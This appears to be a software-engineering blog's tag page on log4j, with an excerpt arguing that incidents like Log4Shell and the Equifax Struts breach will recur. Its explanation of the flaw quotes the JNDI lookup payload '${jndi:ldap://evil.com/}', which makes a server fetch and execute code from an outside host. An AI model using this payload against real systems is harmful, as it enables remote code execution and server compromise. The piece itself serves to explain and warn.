Short and concise stories, for software engineers.

log4j

A collection of 2 issues

We should be more prepared when the next Log4Shell arrives

Remember the Equifax breach that happened 4 years ago, caused by an Apache Struts vulnerability (CVE-2017-5638)? I argue that it's quite similar in nature to the new log4j vulnerability, and moreover - it will happen again, in a different project.

TL;DR: log4j vulnerability

log4j implements lookups with JNDI enabled by default: you could have written ${jndi:ldap://evil.com/} and get the server lookup that URL, then load and execute, using JNDI, the Java object that was returned.